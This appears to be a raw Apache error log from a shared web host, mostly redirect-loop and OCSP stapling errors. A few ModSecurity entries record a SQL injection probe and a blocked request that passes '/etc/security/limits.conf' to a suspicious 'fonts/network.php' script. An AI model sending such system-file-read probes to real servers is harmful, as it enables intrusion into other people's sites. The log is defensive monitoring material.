[Mon May 11 14:10:50.431347 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/includes/phpinfo.php"] [unique_id "agHHSqy-5-wpj6Sx56aBmgAAABU"]
[Mon May 11 14:10:51.526933 2026] [core:error] [pid 1319885:tid 1319889] [client 52.242.216.199:59545] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:51.526966 2026] [core:error] [pid 1319885:tid 1319889] [client 52.242.216.199:59545] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:52.669244 2026] [core:error] [pid 1319998:tid 1320021] [client 52.242.216.199:59554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:52.669280 2026] [core:error] [pid 1319998:tid 1320021] [client 52.242.216.199:59554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:54.962647 2026] [core:error] [pid 1320398:tid 1320414] [client 52.242.216.199:21714] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:54.962672 2026] [core:error] [pid 1320398:tid 1320414] [client 52.242.216.199:21714] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:55.548025 2026] [authz_core:error] [pid 1319886:tid 1319937] [client 216.73.216.110:61507] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/Twig/error_log
[Mon May 11 14:10:56.287979 2026] [core:error] [pid 1319953:tid 1319979] [client 52.242.216.199:59613] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:56.288015 2026] [core:error] [pid 1319953:tid 1319979] [client 52.242.216.199:59613] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:56.931257 2026] [core:error] [pid 1319998:tid 1320008] [client 52.242.216.199:59579] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:56.931288 2026] [core:error] [pid 1319998:tid 1320008] [client 52.242.216.199:59579] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:59.473785 2026] [core:error] [pid 1319953:tid 1319959] [client 52.242.216.199:21674] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:59.473818 2026] [core:error] [pid 1319953:tid 1319959] [client 52.242.216.199:21674] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:01.405248 2026] [core:error] [pid 1320398:tid 1320420] [client 52.242.216.199:59642] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:01.405284 2026] [core:error] [pid 1320398:tid 1320420] [client 52.242.216.199:59642] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:02.102415 2026] [core:error] [pid 1319886:tid 1319934] [client 52.242.216.199:59552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:02.102449 2026] [core:error] [pid 1319886:tid 1319934] [client 52.242.216.199:59552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:03.010349 2026] [core:error] [pid 1320398:tid 1320403] [client 52.242.216.199:59567] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:03.010385 2026] [core:error] [pid 1320398:tid 1320403] [client 52.242.216.199:59567] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:04.790270 2026] [core:error] [pid 1320398:tid 1320406] [client 52.242.216.199:59633] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:04.790305 2026] [core:error] [pid 1320398:tid 1320406] [client 52.242.216.199:59633] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:06.171132 2026] [core:error] [pid 1319953:tid 1319955] [client 52.242.216.199:59601] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:06.171179 2026] [core:error] [pid 1319953:tid 1319955] [client 52.242.216.199:59601] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:06.982653 2026] [core:error] [pid 1319998:tid 1320003] [client 52.242.216.199:59583] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:06.982685 2026] [core:error] [pid 1319998:tid 1320003] [client 52.242.216.199:59583] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:07.881654 2026] [core:error] [pid 1320398:tid 1320409] [client 52.242.216.199:21734] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:07.881688 2026] [core:error] [pid 1320398:tid 1320409] [client 52.242.216.199:21734] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:09.571039 2026] [core:error] [pid 1320398:tid 1320411] [client 52.242.216.199:21649] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:09.571077 2026] [core:error] [pid 1320398:tid 1320411] [client 52.242.216.199:21649] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:11.428384 2026] [core:error] [pid 1320398:tid 1320408] [client 52.242.216.199:21641] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:11.428413 2026] [core:error] [pid 1320398:tid 1320408] [client 52.242.216.199:21641] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:12.976467 2026] [core:error] [pid 1319886:tid 1319906] [client 52.242.216.199:59522] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:12.976578 2026] [core:error] [pid 1319886:tid 1319906] [client 52.242.216.199:59522] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:14.427461 2026] [:error] [pid 1319998:tid 1320019] [client 193.32.162.60:36412] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:11:14.470370 2026] [:error] [pid 1319998:tid 1320019] [client 193.32.162.60:36412] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:11:14.971936 2026] [core:error] [pid 1320674:tid 1320701] [client 52.242.216.199:21574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:14.971963 2026] [core:error] [pid 1320674:tid 1320701] [client 52.242.216.199:21574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:16.174776 2026] [core:error] [pid 1319953:tid 1319956] [client 52.242.216.199:59619] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:16.174806 2026] [core:error] [pid 1319953:tid 1319956] [client 52.242.216.199:59619] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:17.547197 2026] [core:error] [pid 1319886:tid 1319929] [client 52.242.216.199:21750] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:17.547223 2026] [core:error] [pid 1319886:tid 1319929] [client 52.242.216.199:21750] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:18.966814 2026] [core:error] [pid 1320674:tid 1320696] [client 52.242.216.199:21705] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:18.966842 2026] [core:error] [pid 1320674:tid 1320696] [client 52.242.216.199:21705] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:20.326289 2026] [core:error] [pid 1319998:tid 1320018] [client 52.242.216.199:21711] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:20.326315 2026] [core:error] [pid 1319998:tid 1320018] [client 52.242.216.199:21711] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:21.146568 2026] [core:error] [pid 1320398:tid 1320415] [client 52.242.216.199:59631] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:21.146598 2026] [core:error] [pid 1320398:tid 1320415] [client 52.242.216.199:59631] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:21.611908 2026] [core:error] [pid 1319953:tid 1319962] [client 52.242.216.199:59549] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:21.611944 2026] [core:error] [pid 1319953:tid 1319962] [client 52.242.216.199:59549] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:22.787204 2026] [core:error] [pid 1320674:tid 1320711] [client 52.242.216.199:21651] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:22.787332 2026] [core:error] [pid 1320674:tid 1320711] [client 52.242.216.199:21651] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:23.861747 2026] [core:error] [pid 1319885:tid 1319927] [client 52.242.216.199:21669] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:23.861775 2026] [core:error] [pid 1319885:tid 1319927] [client 52.242.216.199:21669] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:24.959072 2026] [core:error] [pid 1320674:tid 1320704] [client 52.242.216.199:21732] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:24.959104 2026] [core:error] [pid 1320674:tid 1320704] [client 52.242.216.199:21732] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:25.867415 2026] [core:error] [pid 1320398:tid 1320420] [client 52.242.216.199:59569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:25.867454 2026] [core:error] [pid 1320398:tid 1320420] [client 52.242.216.199:59569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:26.946498 2026] [core:error] [pid 1319886:tid 1319899] [client 52.242.216.199:21725] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:26.946535 2026] [core:error] [pid 1319886:tid 1319899] [client 52.242.216.199:21725] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:11:40.256305 2026] [ssl:error] [pid 1320398:tid 1320407] (EAI 2)Name or service not known: [client 43.135.144.81:56162] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:11:40.256485 2026] [ssl:error] [pid 1320398:tid 1320407] AH01941: stapling_renew_response: responder error
[Mon May 11 14:11:40.423339 2026] [security2:error] [pid 1320398:tid 1320407] [client 43.135.144.81:56162] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "happy-baby-box.fr"] [uri "/"] [unique_id "agHHfOJEyNRN152ArOR0agAAAEc"], referer: http://happy-baby-box.fr
[Mon May 11 14:11:42.057224 2026] [ssl:error] [pid 1319953:tid 1319973] (EAI 2)Name or service not known: [client 43.135.144.81:59710] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:11:42.057267 2026] [ssl:error] [pid 1319953:tid 1319973] AH01941: stapling_renew_response: responder error
[Mon May 11 14:11:42.472021 2026] [security2:error] [pid 1319953:tid 1319973] [client 43.135.144.81:59710] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "happy-baby-box.fr"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agHHfuSQ-m-m0ukSShtrvAAAAVI"], referer: https://happy-baby-box.fr/
[Mon May 11 14:12:05.839953 2026] [ssl:error] [pid 1320398:tid 1320409] (EAI 2)Name or service not known: [client 217.181.197.168:50116] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:12:05.839997 2026] [ssl:error] [pid 1320398:tid 1320409] AH01941: stapling_renew_response: responder error
[Mon May 11 14:12:05.843465 2026] [ssl:error] [pid 1319953:tid 1319978] (EAI 2)Name or service not known: [client 217.181.197.168:56664] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:12:05.843494 2026] [ssl:error] [pid 1319953:tid 1319978] AH01941: stapling_renew_response: responder error
[Mon May 11 14:12:12.830661 2026] [ssl:error] [pid 1319885:tid 1319930] (EAI 2)Name or service not known: [client 66.249.93.78:59379] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:12:12.833884 2026] [ssl:error] [pid 1319885:tid 1319930] AH01941: stapling_renew_response: responder error
[Mon May 11 14:12:12.900433 2026] [ssl:error] [pid 1319953:tid 1319957] (EAI 2)Name or service not known: [client 217.181.197.168:61613] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:12:12.900453 2026] [ssl:error] [pid 1319953:tid 1319957] AH01941: stapling_renew_response: responder error
[Mon May 11 14:12:12.902507 2026] [ssl:error] [pid 1320674:tid 1320706] (EAI 2)Name or service not known: [client 217.181.197.168:62650] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:12:12.902543 2026] [ssl:error] [pid 1320674:tid 1320706] AH01941: stapling_renew_response: responder error
[Mon May 11 14:12:13.892565 2026] [ssl:error] [pid 1319953:tid 1319961] (EAI 2)Name or service not known: [client 193.186.4.105:35664] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:12:13.892597 2026] [ssl:error] [pid 1319953:tid 1319961] AH01941: stapling_renew_response: responder error
[Mon May 11 14:12:14.064917 2026] [ssl:error] [pid 1320674:tid 1320693] (EAI 2)Name or service not known: [client 217.181.197.168:61122] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:12:14.064945 2026] [ssl:error] [pid 1320674:tid 1320693] AH01941: stapling_renew_response: responder error
[Mon May 11 14:12:30.448810 2026] [ssl:error] [pid 1320398:tid 1320402] (EAI 2)Name or service not known: [client 217.181.197.168:49782] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:12:30.448849 2026] [ssl:error] [pid 1320398:tid 1320402] AH01941: stapling_renew_response: responder error
[Mon May 11 14:12:30.451538 2026] [ssl:error] [pid 1319953:tid 1319958] (EAI 2)Name or service not known: [client 217.181.197.168:58034] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:12:30.451568 2026] [ssl:error] [pid 1319953:tid 1319958] AH01941: stapling_renew_response: responder error
[Mon May 11 14:12:32.658773 2026] [ssl:error] [pid 1319953:tid 1319973] (EAI 2)Name or service not known: [client 217.181.197.168:57070] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:12:32.658808 2026] [ssl:error] [pid 1319953:tid 1319973] AH01941: stapling_renew_response: responder error
[Mon May 11 14:12:32.662778 2026] [ssl:error] [pid 1320674:tid 1320694] (EAI 2)Name or service not known: [client 217.181.197.168:65455] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:12:32.662812 2026] [ssl:error] [pid 1320674:tid 1320694] AH01941: stapling_renew_response: responder error
[Mon May 11 14:12:37.919315 2026] [security2:error] [pid 1320398:tid 1320401] [client 43.159.140.236:41948] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/"] [unique_id "agHHteJEyNRN152ArOR0xgAAAEE"], referer: http://www.apoe.fr
[Mon May 11 14:12:39.536645 2026] [:error] [pid 1320674:tid 1320705] [client 217.174.153.81:58748] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 14:13:11.137315 2026] [ssl:error] [pid 1320398:tid 1320417] (EAI 2)Name or service not known: [client 172.238.172.223:41834] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:13:11.137371 2026] [ssl:error] [pid 1320398:tid 1320417] AH01941: stapling_renew_response: responder error
[Mon May 11 14:13:34.010415 2026] [security2:error] [pid 1319998:tid 1320002] [client 43.163.206.70:56420] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "k06.fr"] [uri "/"] [unique_id "agHH7qt2WtvoFr7xvGy-KgAAAII"]
[Mon May 11 14:14:41.771560 2026] [security2:error] [pid 1319885:tid 1319920] [client 43.157.53.115:56720] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rixonephotography.com"] [uri "/"] [unique_id "agHIMVchVQ3tCn0m9OpCtQAAARE"]
[Mon May 11 14:14:44.822145 2026] [security2:error] [pid 1319885:tid 1319890] [client 43.157.53.115:34380] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agHINFchVQ3tCn0m9OpCtwAAAQI"], referer: http://www.rixonephotography.com
[Mon May 11 14:14:50.066454 2026] [ssl:error] [pid 1319885:tid 1319918] (EAI 2)Name or service not known: [client 195.178.110.64:5702] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:14:50.066521 2026] [ssl:error] [pid 1319885:tid 1319918] AH01941: stapling_renew_response: responder error
[Mon May 11 14:15:42.409920 2026] [security2:error] [pid 1319885:tid 1319938] [client 216.73.216.110:29490] ModSecurity: Warning. Matched phrase "etc/security/limits" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/security/limits found within ARGS:filesrc: /etc/security/limits.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHIblchVQ3tCn0m9OpC-wAAARg"]
[Mon May 11 14:15:42.412744 2026] [security2:error] [pid 1319885:tid 1319938] [client 216.73.216.110:29490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHIblchVQ3tCn0m9OpC-wAAARg"]
[Mon May 11 14:15:42.510262 2026] [security2:error] [pid 1319885:tid 1319938] [client 216.73.216.110:29490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHIblchVQ3tCn0m9OpC-wAAARg"]
[Mon May 11 14:15:45.085899 2026] [autoindex:error] [pid 1319998:tid 1320021] [client 3.233.59.216:42865] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 14:16:19.690569 2026] [ssl:error] [pid 1319998:tid 1320022] [client 54.86.115.253:4536] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname cpcalendars.conge.tct-telecom.fr provided via HTTP have no compatible SSL setup for policy 'secure'
